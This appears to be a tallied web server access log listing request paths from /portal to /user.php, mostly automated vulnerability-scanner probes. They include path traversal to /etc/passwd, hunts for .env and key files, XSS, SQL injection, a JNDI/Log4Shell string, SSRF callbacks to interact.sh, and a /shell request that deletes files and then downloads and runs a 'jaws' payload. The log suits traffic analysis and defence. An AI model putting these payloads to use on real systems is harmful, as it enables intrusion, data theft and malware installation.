HTTP/1.1 |
3 | GET | /portal/.env.production |
HTTP/1.1 |
3 | GET | /portal/.env.staging |
HTTP/1.1 |
3 | GET | /portal/.env |
HTTP/1.1 |
2 | GET | /portal//..%5C%5C%5C..%5C%5C%5C..%5C%5C%5C..%5C%5C%5Cwindows%5Cwin.ini |
HTTP/1.1 |
2 | GET | /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd |
HTTP/1.1 |
1 | GET | /portal/images/MyVue/MyVueHelp.png |
HTTP/1.1 |
1 | GET | /portal/info.jsp |
HTTP/1.1 |
1 | GET | /portal/login |
HTTP/1.1 |
2 | GET | /portal/portalhelp/en/ |
HTTP/1.1 |
1 | GET | /portal/webclient/index.html |
HTTP/1.1 |
1 | GET | /pre-commit-config.yaml |
HTTP/1.1 |
2 | GET | /premise/front/getPingData?url=http[:]//0[.]0[.]0[.]0:9600/sm/api/v1/firewall/zone/services?zone=/usr/bin/id |
HTTP/1.1 |
1 | GET | /pro/login |
HTTP/1.1 |
1 | GET | /process/feries.php?fichier=../../../../../../../etc/passwd |
HTTP/1.1 |
3 | GET | /prod/.env.local |
HTTP/1.1 |
3 | GET | /prod/.env.production |
HTTP/1.1 |
3 | GET | /prod/.env.staging |
HTTP/1.1 |
6 | GET | /prod/.env |
HTTP/1.1 |
2 | GET | /prod/lib/php/ |
HTTP/1.1 |
3 | GET | /product/.env.local |
HTTP/1.1 |
3 | GET | /product/.env.production |
HTTP/1.1 |
3 | GET | /product/.env.staging |
HTTP/1.1 |
3 | GET | /product/.env |
HTTP/1.1 |
1 | GET | /production.log |
HTTP/1.1 |
3 | GET | /production/.env.local |
HTTP/1.1 |
3 | GET | /production/.env.production |
HTTP/1.1 |
3 | GET | /production/.env.staging |
HTTP/1.1 |
3 | GET | /production/.env |
HTTP/1.1 |
1 | GET | /profile |
HTTP/1.1 |
3 | GET | /project/.env.local |
HTTP/1.1 |
3 | GET | /project/.env.production |
HTTP/1.1 |
3 | GET | /project/.env.staging |
HTTP/1.1 |
3 | GET | /project/.env |
HTTP/1.1 |
1 | GET | /properties.ini |
HTTP/1.1 |
1 | GET | /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/2LM9ciWZPKJ2qMWOtPi82PqzbzT/)%3B%2F%2F |
HTTP/1.1 |
1 | GET | /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/2LNn6WS9ZtC45WD7BauIavKEfn8/)%3B%2F%2F |
HTTP/1.1 |
1 | GET | /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
2 | GET | /proxy.stream?origin=http[:]// |
HTTP/1.1 |
2 | GET | /prweb/PRAuth/app/default/ |
HTTP/1.1 |
1 | GET | /prweb/PRRestService/unauthenticatedAPI/v1/docs |
HTTP/1.1 |
1 | GET | /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd |
HTTP/1.1 |
3 | GET | /public/.env.local |
HTTP/1.1 |
3 | GET | /public/.env.production |
HTTP/1.1 |
3 | GET | /public/.env.staging |
HTTP/1.1 |
6 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /public/css/2LNn5u2s7cEH9e8wt77PVdOTT34.css |
HTTP/1.1 |
2 | GET | /public/index.php/home/file/user_pics |
HTTP/1.1 |
1 | GET | /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= |
HTTP/1.1 |
1 | GET | /public/login.htm?type=probes |
HTTP/1.1 |
1 | GET | /public/login.htm?type=requests |
HTTP/1.1 |
1 | GET | /public/login.html |
HTTP/1.1 |
1 | GET | /public/login.php |
HTTP/1.1 |
1 | GET | /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
3 | GET | /public_html/.env.local |
HTTP/1.1 |
3 | GET | /public_html/.env.production |
HTTP/1.1 |
3 | GET | /public_html/.env.staging |
HTTP/1.1 |
3 | GET | /public_html/.env |
HTTP/1.1 |
2 | GET | /pubspec.yaml |
HTTP/1.1 |
1 | GET | /pureweb/server/login.jsp |
HTTP/1.1 |
1 | GET | /pyproject.toml |
HTTP/1.1 |
1 | GET | /q?baba=lala&end=2020/10/25-15:56:44&grid=t&json&m=sum:sys.cpu.nice&o&start=2000/10/21-00:00:00&style=linespoint&wxh=1516x644&xrange=10:10&ylabel&yrange=[33:system(%27wget%20http[:]//interact[.]sh%27)] |
HTTP/1.1 |
3 | GET | /qa/.env.local |
HTTP/1.1 |
3 | GET | /qa/.env.production |
HTTP/1.1 |
3 | GET | /qa/.env.staging |
HTTP/1.1 |
3 | GET | /qa/.env |
HTTP/1.1 |
2 | GET | /qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /qiqi/94644/ |
HTTP/1.1 |
1 | GET | /qmailadmin/qmailadmin.cgi |
HTTP/1.1 |
1 | GET | /query?db=db&q=SHOW%20DATABASES |
HTTP/1.1 |
2 | GET | /radiusmanager/user.php |
HTTP/1.1 |
1 | GET | /readme.md |
HTTP/1.1 |
1 | GET | /readme.txt |
HTTP/1.1 |
1 | GET | /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs |
HTTP/1.1 |
2 | GET | /redirector.php?url=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /redis.conf |
HTTP/1.1 |
1 | GET | /redmine/config/environment.rb |
HTTP/1.1 |
1 | GET | /registerUser.html?init=1 |
HTTP/1.1 |
1 | GET | /remote/login |
HTTP/1.1 |
2 | GET | /remote/loginredir?redir=javascript:alert(document.domain) |
HTTP/1.1 |
2 | GET | /remotereporter/load_logfiles.php?server=127.0.0.1&url=https[:]//interact[.]sh/ |
HTTP/1.1 |
1 | GET | /report/ReportServer?cmd=get_geo_json&op=chart&resourcepath=privilege.xml |
HTTP/1.1 |
1 | GET | /reports/rwservlet?JOBTYPE=rwurl&URLPARAMETER=file:///&desformat=html&destype=cache&report=test.rdf |
HTTP/1.1 |
1 | GET | /repos?visibility=public |
HTTP/1.1 |
1 | GET | /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%2520TemplateMsg.js.zgz?skin=../../../../../../../../../etc/passwd%00&v=091214175450 |
HTTP/1.1 |
2 | GET | /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%2520TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00&v=091214175450 |
HTTP/1.1 |
1 | GET | /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs |
HTTP/1.1 |
1 | GET | /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp |
HTTP/1.1 |
1 | GET | /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml |
HTTP/1.1 |
1 | GET | /resource/file%253a///etc/passwd/ |
HTTP/1.1 |
1 | GET | /resources//../WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /responsiveUI/ |
HTTP/1.1 |
1 | GET | /responsiveUI/webmail/folder.xhtml |
HTTP/1.1 |
1 | GET | /rest/api/2/projectCategory?maxResults=1000 |
HTTP/1.1 |
1 | GET | /rest/api/2/screens |
HTTP/1.1 |
1 | GET | /rest/api/2/user/picker?query |
HTTP/1.1 |
2 | GET | /rest/api/latest/groupuserpicker?maxResults=50000&query=1&showAvatar=true |
HTTP/1.1 |
1 | GET | /rest/api/latest/repos |
HTTP/1.1 |
1 | GET | /rest/api/latest/serverInfo |
HTTP/1.1 |
2 | GET | /rest/config/1.0/directory |
HTTP/1.1 |
2 | GET | /rest/menu/latest/admin |
HTTP/1.1 |
1 | GET | /robomongo.json |
HTTP/1.1 |
7 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /rollup.config.js |
HTTP/1.1 |
1 | GET | /roundcube/logs/errors.log |
HTTP/1.1 |
1 | GET | /roundcube/logs/sendmail |
HTTP/1.1 |
1 | GET | /routes/error_log |
HTTP/1.1 |
1 | GET | /royal_event/ |
HTTP/1.1 |
1 | GET | /rsso/admin/ |
HTTP/1.1 |
1 | GET | /runningpods/ |
HTTP/1.1 |
1 | GET | /s/2LNn6PHF2n3qaaDKfsI5OLLcwlm/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml |
HTTP/1.1 |
1 | GET | /s/2LNn6PHF2n3qaaDKfsI5OLLcwlm/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml |
HTTP/1.1 |
1 | GET | /s3cmd.ini |
HTTP/1.1 |
1 | GET | /sample-apps/hello/%252f/ |
HTTP/1.1 |
1 | GET | /sample.htaccess |
HTTP/1.1 |
1 | GET | /sap/admin/public/default.html |
HTTP/1.1 |
1 | GET | /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled |
HTTP/1.1 |
1 | GET | /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html |
HTTP/1.1 |
1 | GET | /sap/hana/xs/formLogin/login.html |
HTTP/1.1 |
2 | GET | /sap/public/bc/icf/logoff?redirecturl=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /sap/public/bc/ur/Login/assets/corbu/sap_logo.png |
HTTP/1.1 |
1 | GET | /sap/public/info |
HTTP/1.1 |
2 | GET | /sapi/debug/default/view |
HTTP/1.1 |
1 | GET | /saw.dll?bieehome&startPage=1 |
HTTP/1.1 |
1 | GET | /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. |
HTTP/1.1 |
2 | GET | /schema.rb |
HTTP/1.1 |
1 | GET | /scriptcase/prod/lib/php/ |
HTTP/1.1 |
1 | GET | /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 |
HTTP/1.1 |
1 | GET | /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /search.htm?searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&searchstring2 |
HTTP/1.1 |
1 | GET | /search.php?search=%22wget+http%3A%2F%2F%27%22 |
HTTP/1.1 |
1 | GET | /search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /search/token.json |
HTTP/1.1 |
1 | GET | /search?search_key=%7B%7B1337*1338%7D%7D |
HTTP/1.1 |
1 | GET | /secadmin/ |
HTTP/1.1 |
3 | GET | /secrets.yml |
HTTP/1.1 |
2 | GET | /secure/ConfigurePortalPages!default.jspa?Search=Search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&view=search |
HTTP/1.1 |
1 | GET | /secure/ContactAdministrators!default.jspa |
HTTP/1.1 |
1 | GET | /secure/ManageFilters.jspa?filter=popular&filterView=popular |
HTTP/1.1 |
1 | GET | /secure/QueryComponent!Default.jspa |
HTTP/1.1 |
1 | GET | /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin |
HTTP/1.1 |
1 | GET | /secure/Signup!default.jspa |
HTTP/1.1 |
1 | GET | /secure/ViewUserHover.jspa |
HTTP/1.1 |
1 | GET | /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. |
HTTP/1.1 |
2 | GET | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http[:]// |
HTTP/1.1 |
1 | GET | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http[:]//aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload |
HTTP/1.1 |
1 | GET | /seeyon/thirdpartyController.do.css/..;/ajax.do |
HTTP/1.1 |
1 | GET | /seeyon/webmail.do?filePath=../conf/datasourceCtp.properties&filename=index.jsp&method=doDownloadAtt |
HTTP/1.1 |
1 | GET | /self.key |
HTTP/1.1 |
1 | GET | /sensorlist.htm |
HTTP/1.1 |
1 | GET | /server-common/cgi-bin/login |
HTTP/1.1 |
1 | GET | /server.key |
HTTP/1.1 |
3 | GET | /server/.env.local |
HTTP/1.1 |
3 | GET | /server/.env.production |
HTTP/1.1 |
3 | GET | /server/.env.staging |
HTTP/1.1 |
3 | GET | /server/.env |
HTTP/1.1 |
2 | GET | /server/ |
HTTP/1.1 |
3 | GET | /server/config.json |
HTTP/1.1 |
1 | GET | /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini |
HTTP/1.1 |
1 | GET | /server/sdk/rest/index.html |
HTTP/1.1 |
1 | GET | /server/status |
HTTP/1.1 |
1 | GET | /server/storage/ |
HTTP/1.1 |
1 | GET | /service-account-credentials.json |
HTTP/1.1 |
3 | GET | /service/.env.local |
HTTP/1.1 |
3 | GET | /service/.env.production |
HTTP/1.1 |
3 | GET | /service/.env.staging |
HTTP/1.1 |
3 | GET | /service/.env |
HTTP/1.1 |
1 | GET | /service/error/sfdc_preauth.jsp?server=http[:]//%23.salesforce.com/&session=s&userid=1 |
HTTP/1.1 |
1 | GET | /service/v1/service-details |
HTTP/1.1 |
2 | GET | /servicedesk/customer/portal/10/user/login |
HTTP/1.1 |
1 | GET | /servicedesk/customer/user/login |
HTTP/1.1 |
3 | GET | /services/.env.local |
HTTP/1.1 |
3 | GET | /services/.env.production |
HTTP/1.1 |
3 | GET | /services/.env.staging |
HTTP/1.1 |
3 | GET | /services/.env |
HTTP/1.1 |
1 | GET | /services/pluginscript/..;/..;/ |
HTTP/1.1 |
1 | GET | /services/pluginscript/ |
HTTP/1.1 |
2 | GET | /services/user/values.xml?var=STATUS |
HTTP/1.1 |
1 | GET | /servlet/BrowserServlet |
HTTP/1.1 |
1 | GET | /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /servlet/mstrWeb/ |
HTTP/1.1 |
2 | GET | /servlet/mstrWebAdmin/ |
HTTP/1.1 |
2 | GET | /servlet/mstrWebAdmin |
HTTP/1.1 |
2 | GET | /servlet/mstrWeb |
HTTP/1.1 |
2 | GET | /servlet/taskProc/ |
HTTP/1.1 |
1 | GET | /servlet/taskProc?srcURL=https[:]//google[.]com&taskContentType=xml&taskEnv=xml&taskId=shortURL |
HTTP/1.1 |
2 | GET | /servlet/taskProc |
HTTP/1.1 |
1 | GET | /sess-bin/login_session.cgi |
HTTP/1.1 |
1 | GET | /session |
HTTP/1.1 |
1 | GET | /sessions/new |
HTTP/1.1 |
2 | GET | /settings.php.bak |
HTTP/1.1 |
1 | GET | /settings.php.dist |
HTTP/1.1 |
1 | GET | /settings.php.old |
HTTP/1.1 |
1 | GET | /settings.php.save |
HTTP/1.1 |
1 | GET | /settings.php.swp |
HTTP/1.1 |
1 | GET | /settings.php.txt |
HTTP/1.1 |
1 | GET | /settings.php |
HTTP/1.1 |
1 | GET | /setup.cgi?todo=debug&x=currentsetting.htm |
HTTP/1.1 |
1 | GET | /setup.php |
HTTP/1.1 |
2 | GET | /setup/index.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers |
HTTP/1.1 |
1 | GET | /setup/index.php |
HTTP/1.1 |
1 | GET | /setupAssistant.html |
HTTP/1.1 |
2 | GET | /setup |
HTTP/1.1 |
2 | GET | /sftp-config.json |
HTTP/1.1 |
1 | GET | /sftp.json |
HTTP/1.1 |
1 | GET | /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?>helpFile=concepts.html&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!-- |
HTTP/1.1 |
1 | GET | /sgms/auth |
HTTP/1.1 |
2 | GET | /share/api/images/%253Cimg%2520src=x%2520onerror=alert%28document.domain%29%253E/filename |
HTTP/1.1 |
2 | GET | /share/api/notes/%253Cimg%2520src=x%2520onerror=alert%28document.domain%29%253E |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+94[.]158[.]247[.]123/jaws;sh+/tmp/jaws |
HTTP/1.1 |
3 | GET | /shop/.env.local |
HTTP/1.1 |
3 | GET | /shop/.env.production |
HTTP/1.1 |
3 | GET | /shop/.env.staging |
HTTP/1.1 |
3 | GET | /shop/.env |
HTTP/1.1 |
1 | GET | /showfile.php?file=/etc/passwd |
HTTP/1.1 |
2 | GET | /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 |
HTTP/1.1 |
2 | GET | /signEzUI/playlist/edit/upload/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd |
HTTP/1.1 |
1 | GET | /signup?next=http[:]//interact[.]sh/?app.scan/ |
HTTP/1.1 |
2 | GET | /site.sql |
HTTP/1.1 |
1 | GET | /sitecore/' |
HTTP/1.1 |
2 | GET | /sitecore/shell/sitecore.version.xml |
HTTP/1.1 |
1 | GET | /sitemanager.xml |
HTTP/1.1 |
1 | GET | /siteminderagent/forms/smaceauth.fcc?SMAUTHREASON=7&USERNAME=\\u003cimg\\u0020src\\u003dx\\u0020onerror\\u003d\\u0022confirm(document.domain)\\u0022\\u003e |
HTTP/1.1 |
1 | GET | /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /smb.conf |
HTTP/1.1 |
2 | GET | /snippets.inc.php?search=True&searchColumn=snippetName&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchOption=contains |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D./a%7D |
HTTP/1.1 |
6 | GET | /solr/admin/cores?wt=json |
HTTP/1.1 |
1 | GET | /spaces/viewdefaultdecorator.action?decoratorName |
HTTP/1.1 |
1 | GET | /sql.sql |
HTTP/1.1 |
1 | GET | /sqlite/ |
HTTP/1.1 |
1 | GET | /sqlitemanager/ |
HTTP/1.1 |
2 | GET | /squirrelmail/src/login.php |
HTTP/1.1 |
1 | GET | /src/download.php?absolute_dl=true&mailbox=/etc/passwd&passed_ent_id=1&passed_id=1 |
HTTP/1.1 |
1 | GET | /src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E |
HTTP/1.1 |
2 | GET | /src/login.php |
HTTP/1.1 |
1 | GET | /ssf/s/portalLogin |
HTTP/1.1 |
1 | GET | /sso/XUI |
HTTP/1.1 |
1 | GET | /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https[:]//interact[.]sh/ |
HTTP/1.1 |
3 | GET | /staging/.env.local |
HTTP/1.1 |
3 | GET | /staging/.env.production |
HTTP/1.1 |
3 | GET | /staging/.env.staging |
HTTP/1.1 |
3 | GET | /staging/.env |
HTTP/1.1 |
1 | GET | /standard/default.php |
HTTP/1.1 |
1 | GET | /stat.jsp?cmd=chcp+437+%7c+dir |
HTTP/1.1 |
1 | GET | /static../.git/config |
HTTP/1.1 |
1 | GET | /static/..%255c..%255c..%255c..%255cetc/passwd |
HTTP/1.1 |
1 | GET | /static/..%255c..%255c..%255cetc/passwd |
HTTP/1.1 |
1 | GET | /static/..%255cetc/passwd |
HTTP/1.1 |
2 | GET | /static///////../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /static/img/custom_icons/favicon.ico |
HTTP/1.1 |
1 | GET | /static/login/favicon.ico |
HTTP/1.1 |
1 | GET | /static/ueditor/php/controller.php?action=proxy&maxwidth=-1&referer=test&remote=php://filter/convert.base64-encode/resource=/etc/passwd |
HTTP/1.1 |
1 | GET | /stats/summary |
HTTP/1.1 |
2 | GET | /status.htm |
HTTP/1.1 |
1 | GET | /status.html |
HTTP/1.1 |
2 | GET | /status.php |
HTTP/1.1 |
1 | GET | /status?full |
HTTP/1.1 |
2 | GET | /status |
HTTP/1.1 |
2 | GET | /steve/manager/signin |
HTTP/1.1 |
1 | GET | /steve/services/%22%253E%253Cscript%253Ealert%28document.domain%29%253C/script%253E/services/ |
HTTP/1.1 |
3 | GET | /stg/.env.local |
HTTP/1.1 |
3 | GET | /stg/.env.production |
HTTP/1.1 |
3 | GET | /stg/.env.staging |
HTTP/1.1 |
3 | GET | /stg/.env |
HTTP/1.1 |
3 | GET | /storage/.env.local |
HTTP/1.1 |
3 | GET | /storage/.env.production |
HTTP/1.1 |
3 | GET | /storage/.env.staging |
HTTP/1.1 |
3 | GET | /storage/.env |
HTTP/1.1 |
1 | GET | /storage/ |
HTTP/1.1 |
1 | GET | /storage/logs/laravel.log |
HTTP/1.1 |
1 | GET | /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 |
HTTP/1.1 |
1 | GET | /super/login.html?lang=en |
HTTP/1.1 |
1 | GET | /swagger-resources/restservices/v2/api-docs |
HTTP/1.1 |
1 | GET | /swagger-ui.js |
HTTP/1.1 |
1 | GET | /swagger-ui/swagger-ui.js |
HTTP/1.1 |
1 | GET | /swagger.json |
HTTP/1.1 |
1 | GET | /swagger.yaml |
HTTP/1.1 |
2 | GET | /swagger/index.html |
HTTP/1.1 |
1 | GET | /swagger/swagger-ui.html |
HTTP/1.1 |
1 | GET | /swagger/swagger-ui.js |
HTTP/1.1 |
1 | GET | /swagger/ui/index |
HTTP/1.1 |
2 | GET | /swagger/ui/swagger-ui.js |
HTTP/1.1 |
2 | GET | /swagger/v1/swagger.json |
HTTP/1.1 |
1 | GET | /swagger/v1/swagger.yaml |
HTTP/1.1 |
1 | GET | /sws/index.html |
HTTP/1.1 |
1 | GET | /synnefoclient/ |
HTTP/1.1 |
1 | GET | /sysmgmt/2015/bmc/info |
HTTP/1.1 |
1 | GET | /system-diagnostics |
HTTP/1.1 |
2 | GET | /system/bgservlets/test.css |
HTTP/1.1 |
2 | GET | /system/console/bundles |
HTTP/1.1 |
2 | GET | /system/console?.css |
HTTP/1.1 |
2 | GET | /system/deviceInfo?auth=YWRtaW46MTEK |
HTTP/1.1 |
2 | GET | /system/help/support |
HTTP/1.1 |
1 | GET | /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== |
HTTP/1.1 |
1 | GET | /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== |
HTTP/1.1 |
1 | GET | /system/sling/cqform/defaultlogin.html |
HTTP/1.1 |
1 | GET | /system/sling/info.sessionInfo.json |
HTTP/1.1 |
1 | GET | /system/sling/loginstatus.css |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
2 | GET | /systemstatus.xml |
HTTP/1.1 |
2 | GET | /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 |
HTTP/1.1 |
2 | GET | /tag_test_action.php?partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}&token&url=a |
HTTP/1.1 |
2 | GET | /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
2 | GET | /teampass |
HTTP/1.1 |
3 | GET | /temp.php |
HTTP/1.1 |
1 | GET | /temp.sql |
HTTP/1.1 |
1 | GET | /test.php?action=config |
HTTP/1.1 |
4 | GET | /test.php |
HTTP/1.1 |
2 | GET | /test.txt%250d%250aSet-Cookie:CRLFInjection=Test%250d%250aLocation:%2520interact.sh%250d%250aX-XSS-Protection:0 |
HTTP/1.1 |
3 | GET | /test/.env.local |
HTTP/1.1 |
3 | GET | /test/.env.production |
HTTP/1.1 |
3 | GET | /test/.env.staging |
HTTP/1.1 |
3 | GET | /test/.env |
HTTP/1.1 |
1 | GET | /testrail/files.md5 |
HTTP/1.1 |
1 | GET | /tests/generate.php |
HTTP/1.1 |
1 | GET | /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B |
HTTP/1.1 |
1 | GET | /theme/META-INF/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/passwd |
HTTP/1.1 |
1 | GET | /theme/META-INF/prototype%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25afwindows/win.ini |
HTTP/1.1 |
2 | GET | /theme/default/img/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd |
HTTP/1.1 |
1 | GET | /themes |
HTTP/1.1 |
1 | GET | /threaddump |
HTTP/1.1 |
1 | GET | /thruk/cgi-bin/login.cgi?thruk/ |
HTTP/1.1 |
1 | GET | /tiki-jsplugin.php?language=../../../../../../../../../../windows/win.ini&plugin=x |
HTTP/1.1 |
1 | GET | /tiki-login.php |
HTTP/1.1 |
1 | GET | /tiki-login_scr.php |
HTTP/1.1 |
4 | GET | /time.php |
HTTP/1.1 |
1 | GET | /tips/tipsLogin.action |
HTTP/1.1 |
1 | GET | /tmui/login.jsp |
HTTP/1.1 |
1 | GET | /tmui/tmui/login/welcome.jsp |
HTTP/1.1 |
1 | GET | /toLogin |
HTTP/1.1 |
2 | GET | /token.json |
HTTP/1.1 |
1 | GET | /tool/log/c.php?host=2LM9d8kuZxxyzYsTAIsBSbuuaYU&strip_slashes=md5 |
HTTP/1.1 |
1 | GET | /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd |
HTTP/1.1 |
1 | GET | /tox.ini |
HTTP/1.1 |
1 | GET | /translate.sql |
HTTP/1.1 |
1 | GET | /translations/en.json |
HTTP/1.1 |
2 | GET | /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
3 | GET | /twitter/.env |
HTTP/1.1 |
1 | GET | /typo3/ |
HTTP/1.1 |
1 | GET | /typo3/phpmyadmin/ |
HTTP/1.1 |
2 | GET | /uddiexplorer/SearchPublicRegistries.jsp?btnSubmit=Search&operator=http[:]//&rdoSearch=name&selfor=Business+location&txtSearchfor&txtSearchkey&txtSearchname=sdf |
HTTP/1.1 |
1 | GET | /uddiexplorer/ |
HTTP/1.1 |
2 | GET | /ui/PWResetUserValidation |
HTTP/1.1 |
3 | GET | /ui/ |
HTTP/1.1 |
2 | GET | /ui/index.html |
HTTP/1.1 |
1 | GET | /ui/jobs |
HTTP/1.1 |
1 | GET | /ui/login.action |
HTTP/1.1 |
2 | GET | /ui/login |
HTTP/1.1 |
1 | GET | /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https[:]// |
HTTP/1.1 |
1 | GET | /ui/vropspluginui/rest/services/getstatus |
HTTP/1.1 |
1 | GET | /ui/vropspluginui/rest/services/getvcdetails |
HTTP/1.1 |
1 | GET | /ui_base/js/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd |
HTTP/1.1 |
1 | GET | /ui |
HTTP/1.1 |
1 | GET | /umbraco/BackOffice/Api/Help/GetContextHelpForPage?baseUrl=http[:]//§ion=content&tree=undefined |
HTTP/1.1 |
1 | GET | /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?baseUrl=http[:]///§ion=TryToAvoidGetCacheItem111 |
HTTP/1.1 |
1 | GET | /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?baseUrl=http[:]///§ion=AvoidGetCacheItem |
HTTP/1.1 |
1 | GET | /update.sh |
HTTP/1.1 |
2 | GET | /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27whoami%27 |
HTTP/1.1 |
1 | GET | /upload.jsp |
HTTP/1.1 |
1 | GET | /upload/mobile/index.php?a=asynclist&c=category&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' |
HTTP/1.1 |
1 | GET | /upload/setup/install.php |
HTTP/1.1 |
1 | GET | /user.ini |
HTTP/1.1 |
2 | GET | /user.php?act=login |
HTTP/1.1 |
